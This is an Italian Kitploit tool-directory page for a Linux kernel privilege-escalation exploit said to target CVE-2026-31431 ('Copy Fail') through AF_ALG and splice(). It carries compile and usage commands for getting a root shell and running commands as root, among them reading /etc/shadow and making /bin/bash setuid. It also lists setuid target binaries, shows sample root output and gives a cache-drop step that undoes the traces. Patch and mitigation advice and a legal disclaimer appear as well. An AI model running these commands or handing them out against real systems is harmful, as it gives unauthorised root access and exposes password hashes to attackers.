Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
copy-fail_LPE_Interactive — # Exploit per CVE-2026-31431, una vulnerabilità di corruzione della cache delle pagine del kernel Linux, che fornisce shell root interattiva ed esecuzione di comandi non interattiva tramite catene AF_ALG e splice(). | Kitploit
Strumenti/GitHubGitHub/h1d3r/copy-fail_lpe_interactive
Escalation di PrivilegiFramework di ExploitAnalisi delle VulnerabilitàExploitPenetration TestingBinary Exploitation
GitHubh1d3r/copy-fail_lpe_interactive

copy-fail_LPE_Interactive

# Exploit per CVE-2026-31431, una vulnerabilità di corruzione della cache delle pagine del kernel Linux, che fornisce shell root interattiva ed esecuzione di comandi non interattiva tramite catene AF_ALG e splice().

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3 mesi faNon ancora revisionato

CVE-2026-31431 Copy Fail Exploit

Strumento di sfruttamento della vulnerabilità di contaminazione della page cache del kernel Linux, con supporto per l'esecuzione di comandi non interattivi.

Panoramica della vulnerabilità

CVE-2026-31431 è una vulnerabilità di difetto logico nel kernel Linux, presente nell'implementazione dell'algoritmo AEAD authencesn. Attraverso la catena di syscall AF_ALG e splice(), un attaccante può scrivere 4 byte di dati nella page cache di qualsiasi file leggibile.

Ambito di impatto:

  • Kernel Linux 4.14+ (2017 - aprile 2026)
  • Quasi tutte le principali distribuzioni: Ubuntu, Debian, CentOS, RHEL, Amazon Linux, ecc.

Caratteristiche della vulnerabilità:

  • Affidabilità al 100%, nessuna condizione di gara necessaria
  • Nessun calcolo di offset del kernel richiesto
  • Lo stesso binario funziona su tutte le distribuzioni
  • Non modifica i file su disco, contamina solo la cache di memoria

Descrizione dei file

root@kitploit:~
.
├── copyfail_universal.c    # Codice sorgente POC principale (compilazione statica, nessuna dipendenza da libc)
├── copyfail_universal      # Binario compilato
├── run_cmd.sh              # Script wrapper per esecuzione non interattiva
├── Makefile                # Script di compilazione
└── README.md               # Questo documento

Compilazione

root@kitploit:~
# Metodo 1: utilizzando gcc e ld
gcc -c copyfail_universal.c -o copyfail_universal.o -O2 -fno-stack-protector -fno-pic -fno-pie
ld copyfail_universal.o -o copyfail_universal -static -nostdlib
chmod +x copyfail_universal

# Metodo 2: utilizzando Makefile
make

Utilizzo

Root Shell interattiva

root@kitploit:~
./copyfail_universal

Esecuzione di comandi non interattivi

root@kitploit:~
# Metodo 1: utilizzando lo script wrapper (consigliato)
./run_cmd.sh "id"
./run_cmd.sh "cat /etc/shadow"
./run_cmd.sh "chmod 4777 /bin/bash"

# Metodo 2: tramite pipe
echo 'id > /tmp/pwned.txt; exit' | ./copyfail_universal

# Metodo 3: utilizzando variabili d'ambiente
CMD='whoami' ./copyfail_universal

Specificare un altro target setuid

root@kitploit:~
# Il target predefinito è /usr/bin/su
# È possibile specificare altri target modificando la variabile path nel codice sorgente

# Target comuni disponibili:
# /usr/bin/su
# /usr/bin/passwd
# /usr/bin/chsh
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/pkexec

Ripristino automatico

La vulnerabilità modifica solo la page cache, non i file su disco. Eseguire il seguente comando per ripristinare:

root@kitploit:~
sync; echo 3 > /proc/sys/vm/drop_caches

Lo script run_cmd.sh include già la funzionalità di ripristino automatico.

Output di esempio

root@kitploit:~
$ ./run_cmd.sh "id"

[*] CVE-2026-31431 Copy Fail Exploit
[*] Target: /usr/bin/su
[*] Mode: Interactive shell
[*] Payload size: 112 bytes
[*] Corrupting page cache...
[+] Done! Executing su...

uid=0(root) gid=1000(user) groups=1000(user),4(adm),27(sudo)

Programmi setuid interessati

Per trovare tutti i programmi setuid sul sistema:

root@kitploit:~
find / -perm -4000 -user root -type f 2>/dev/null

Raccomandazioni di correzione

  1. Aggiornare il kernel - Aggiornare a una versione del kernel che includa la patch a664bf3d603d

  2. Mitigazione temporanea - Disabilitare il modulo algif_aead:

    root@kitploit:~
    echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
    rmmod algif_aead 2>/dev/null || true
    
  3. Ambienti container - Utilizzare seccomp per bloccare la creazione di socket AF_ALG

Dettagli tecnici

  • Tipo di vulnerabilità: Scrittura fuori limite nella page cache
  • Causa principale: authencesn utilizza il buffer di destinazione come storage temporaneo, scrivendo 4 byte oltre i limiti
  • Metodo di sfruttamento: Tramite splice() le pagine della page cache vengono passate al sottosistema crypto
  • Capacità di scrittura: Ogni operazione può scrivere 4 byte nella page cache di qualsiasi file leggibile

Disclaimer

Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e a test autorizzati. L'utilizzo di questo strumento per attaccare sistemi non autorizzati è illegale. L'utente si assume ogni responsabilità legale.

Riferimenti

  • CVE-2026-31431 Write-up
  • Xint Blog - Copy Fail
  • GitHub - POC ufficiale
Scarica lo strumento
ProgrammaPercorsoDisponibilità
su/usr/bin/su✅ Predefinito
passwd/usr/bin/passwd✅
chsh/usr/bin/chsh✅
chfn/usr/bin/chfn✅
gpasswd/usr/bin/gpasswd✅
pkexec/usr/bin/pkexec✅
mount/bin/mount✅
umount/bin/umount✅